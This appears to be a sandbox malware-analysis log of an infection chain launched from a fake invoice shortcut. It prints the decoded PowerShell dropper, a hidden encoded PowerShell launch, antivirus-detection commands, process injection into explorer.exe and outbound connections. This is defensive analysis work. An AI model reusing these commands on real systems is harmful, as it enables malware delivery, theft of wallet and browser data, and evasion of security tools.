        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\WalletProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\System32\Windows.ApplicationModel.Wallet.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.muiJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\System32\WalletProxy.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_13-100005
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifAPI coverage: 4.8 %
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifAPI coverage: 0.3 %
        Source: C:\Users\user\AppData\Roaming\fejhsitAPI coverage: 1.5 %
        Source: C:\Windows\explorer.exe TID: 7416Thread sleep count: 421 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 4500Thread sleep count: 960 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 4500Thread sleep time: -96000s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exe TID: 6112Thread sleep count: 1154 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 6112Thread sleep time: -115400s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exe TID: 4500Thread sleep count: 5671 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 4500Thread sleep time: -567100s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\explorer.exe TID: 6280Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\SysWOW64\explorer.exe TID: 7900Thread sleep count: 309 > 30
        Source: C:\Windows\SysWOW64\explorer.exe TID: 7900Thread sleep time: -309000s >= -30000s
        Source: C:\Windows\SysWOW64\explorer.exe TID: 7900Thread sleep count: 9690 > 30
        Source: C:\Windows\SysWOW64\explorer.exe TID: 7900Thread sleep time: -9690000s >= -30000s
        Source: C:\Windows\explorer.exe TID: 3224Thread sleep count: 297 > 30
        Source: C:\Windows\explorer.exe TID: 3224Thread sleep time: -297000s >= -30000s
        Source: C:\Windows\explorer.exe TID: 3224Thread sleep count: 9702 > 30
        Source: C:\Windows\explorer.exe TID: 3224Thread sleep time: -9702000s >= -30000s
        Source: C:\Windows\SysWOW64\explorer.exe TID: 7724Thread sleep count: 306 > 30
        Source: C:\Windows\SysWOW64\explorer.exe TID: 7724Thread sleep time: -306000s >= -30000s
        Source: C:\Windows\SysWOW64\explorer.exe TID: 7724Thread sleep count: 9693 > 30
        Source: C:\Windows\SysWOW64\explorer.exe TID: 7724Thread sleep time: -9693000s >= -30000s
        Source: C:\Windows\explorer.exe TID: 7892Thread sleep count: 306 > 30
        Source: C:\Windows\explorer.exe TID: 7892Thread sleep time: -306000s >= -30000s
        Source: C:\Windows\explorer.exe TID: 7892Thread sleep count: 9693 > 30
        Source: C:\Windows\explorer.exe TID: 7892Thread sleep time: -9693000s >= -30000s
        Source: C:\Windows\SysWOW64\explorer.exe TID: 6628Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\SysWOW64\explorer.exe TID: 3556Thread sleep time: -600000s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\explorer.exeFile Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_004062D5 FindFirstFileW,FindClose,3_2_004062D5
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_00402E18 FindFirstFileW,3_2_00402E18
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406C9B
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00314005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00314005
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031C2FF FindFirstFileW,FindNextFileW,FindClose,13_2_0031C2FF
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031494A GetFileAttributesW,FindFirstFileW,FindClose,13_2_0031494A
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031CD14 FindFirstFileW,FindClose,13_2_0031CD14
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,13_2_0031CD9F
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_0031F5D8
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_0031F735
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031FA36 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_0031FA36
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00313CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00313CE2
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00314005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00314005
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031C2FF FindFirstFileW,FindNextFileW,FindClose,15_2_0031C2FF
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031494A GetFileAttributesW,FindFirstFileW,FindClose,15_2_0031494A
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031CD14 FindFirstFileW,FindClose,15_2_0031CD14
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,15_2_0031CD9F
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0031F5D8
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0031F735
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031FA36 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_0031FA36
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00313CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00313CE2
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00944005
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094C2FF FindFirstFileW,FindNextFileW,FindClose,17_2_0094C2FF
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_0094494A
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,17_2_0094CD9F
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094CD14 FindFirstFileW,FindClose,17_2_0094CD14
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0094F5D8
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0094F735
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094FA36 FindFirstFileW,Sleep,FindNextFileW,FindClose,17_2_0094FA36
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00943CE2
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,13_2_002C5D13
        Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
        Source: explorer.exe, 00000010.00000000.20000801712.000000000905C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrosoft\Windows\CurrentVersion\MMDevices\Audio\Render
        Source: explorer.exe, 00000019.00000003.20381953245.00000000051C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: esWCtDiKHPJd5VuAZT+lfXP0ZltquSV1annvmcifACKCCgbj+1E+Sjm82dK7PErM
        Source: explorer.exe, 00000019.00000003.20381953245.00000000051C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bRgQQVmCICogZGRGQUeIM4N7NXWhuMeKO9Vo0Tq4NO6otUZF697UUhdwiUotro2V
        Source: explorer.exe, 00000019.00000003.20381953245.00000000051C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z3DqeMUGsvgxWISDKEgtgw4yaLYxqB1BLzOonUGpxqAOBP0yHJRgDGpB0BoGjdkA
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CE5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20005267451.000000000CC75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20181642374.000000000CE5F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.20536514758.0000000003677000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20685140752.0000000004DF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20686022020.0000000004DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.21617694512.0000000004DAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.21616732175.0000000004DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20383027059.0000000004DF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.21617595870.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWogle\Chrome\User Data\optimization_guide_model_store\32\E6DC4029A1E4B4C1\6DB02F0F0FEE517C\)
        Source: explorer.exe, 00000012.00000002.20536514758.0000000003649000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
        Source: explorer.exe, 00000019.00000003.20686022020.0000000004DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.21617694512.0000000004DAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.21616732175.0000000004DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20383617255.0000000004DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.24417935014.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
        Source: explorer.exe, 00000019.00000003.20381953245.00000000051C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZltquSV1annvmcifACKCCgbj+1E+Sjm82dK7PErM5/yHeaPKvMlbglMPCwxGUNm0
        Source: explorer.exe, 00000019.00000003.20381953245.00000000051C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +f9/kgzIMmgQVNyjouACBMQdbRgQQVmCICogZGRGQUeIM4N7NXWhuMeKO9Vo0Tq4
        Source: explorer.exe, 00000019.00000003.20381953245.00000000051C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nsfZhyT5WrpfSvcz6Z6EewGLz3DqeMUGsvgxWISDKEgtgw4yaLYxqB1BLzOonUGp
        Source: Productive.pif, 0000000D.00000003.19957552843.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, Productive.pif, 0000000D.00000003.19949399072.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, Productive.pif, 0000000D.00000003.19949820203.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, Productive.pif, 0000000D.00000002.19959480969.00000000016D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:A{S[
        Source: explorer.exe, 00000019.00000003.20381953245.00000000051C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bw1XkLlqWcIj9HrQEMUj9NPsmY7uEfoHYsz89VE8Qt+I7aYoXs9kIs7wCP0CswKM
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSystem information queried: ModuleInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSystem information queried: CodeIntegrityInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_13-98444
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_003245D5 BlockInput,13_2_003245D5
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_002C5240
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002E5CAC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,13_2_002E5CAC
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_004062FC
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_003088CD GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,13_2_003088CD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002DA354 SetUnhandledExceptionFilter,13_2_002DA354
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_002DA385
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002DA354 SetUnhandledExceptionFilter,15_2_002DA354
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_002DA385
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0090A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0090A385
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0090A354 SetUnhandledExceptionFilter,17_2_0090A354

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\explorer.exeFile created: fejhsit.16.drJump to dropped file
        Source: C:\Windows\explorer.exeNetwork Connect: 85.192.60.190 443Jump to behavior
        Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 150.241.91.218 80
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifThread created: C:\Windows\explorer.exe EIP: 4519D0Jump to behavior
        Source: unknownProcess created: Base64 decoded $b64 = @(Select-String -Pattern "aDuck" -Path .\invoice_template.pdf.lnk).Line -replace 'aDuck';Set-Content $env:temp\winpdf.exe -Encoding Byte -Value @([System.Convert]::FromBase64String($b64)); invoke-item $env:temp\winpdf.exe
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifMemory written: C:\Users\user\AppData\Local\Temp\367647\Productive.pif base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\explorer.exeMemory written: PID: 4176 base: DD3BA0 value: 90Jump to behavior
        Source: C:\Windows\explorer.exeMemory written: PID: 3140 base: 7FF6A8600540 value: 90Jump to behavior
        Source: C:\Windows\explorer.exeMemory written: PID: 3684 base: DD3BA0 value: 90Jump to behavior
        Source: C:\Windows\explorer.exeMemory written: PID: 6792 base: 7FF6A8600540 value: 90Jump to behavior
        Source: C:\Windows\explorer.exeMemory written: PID: 808 base: DD3BA0 value: 90Jump to behavior
        Source: C:\Windows\explorer.exeMemory written: PID: 4480 base: 7FF6A8600540 value: 90Jump to behavior
        Source: C:\Windows\explorer.exeMemory written: PID: 6212 base: DD3BA0 value: 90Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DD3BA0Jump to behavior
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DD3BA0Jump to behavior
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DD3BA0Jump to behavior
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DD3BA0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00309369 LogonUserW,13_2_00309369
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_002C5240
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00311AC6 SendInput,keybd_event,13_2_00311AC6
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_003151E2 mouse_event,13_2_003151E2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\winpdf.exe "C:\Users\user\AppData\Local\Temp\winpdf.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Coffee Coffee.bat & Coffee.batJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 367647Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Is + ..\Ashley + ..\Allan + ..\Span YJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\367647\Productive.pif Productive.pif YJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifProcess created: C:\Users\user\AppData\Local\Temp\367647\Productive.pif C:\Users\user\AppData\Local\Temp\367647\Productive.pifJump to behavior
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -e jabiadyanaagad0aiabaacgauwblagwazqbjahqalqbtahqacgbpag4azwagac0auabhahqadablahiabgagaciayqbeahuaywbraciaiaatafaayqb0aggaiaauafwaaqbuahyabwbpagmazqbfahqazqbtahaababhahqazqauahaazabmac4ababuagsakqauaewaaqbuaguaiaatahiazqbwagwayqbjaguaiaanagearab1agmaawanadsauwblahqalqbdag8abgb0aguabgb0acaajablag4adga6ahqazqbtahaaxab3agkabgbwagqazgauaguaeablacaalqbfag4aywbvagqaaqbuagcaiabcahkadablacaalqbwageabab1aguaiabaacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqayga2adqakqapadsaiabpag4adgbvagsazqatagkadablag0aiaakaguabgb2adoadablag0acabcahcaaqbuahaazabmac4azqb4agua
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_003088CD GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,13_2_003088CD
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00314F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,13_2_00314F1C
        Source: winpdf.exe, 00000003.00000003.19328350189.0000000005021000.00000004.00000020.00020000.00000000.sdmp, Productive.pif, 0000000D.00000000.19350609498.0000000000366000.00000002.00000001.01000000.00000009.sdmp, Productive.pif, 0000000F.00000002.20019016954.0000000000366000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: explorer.exe, 00000010.00000000.19996154017.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: Productive.pif, explorer.exe, 00000010.00000000.19998511420.00000000042A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.19996154017.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, fejhsitBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000010.00000000.19995602950.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.19996154017.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000010.00000000.20000801712.0000000009138000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20180551346.0000000009138000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd!t
        Source: explorer.exe, 00000010.00000000.19996154017.0000000000C91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D885B cpuid 13_2_002D885B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
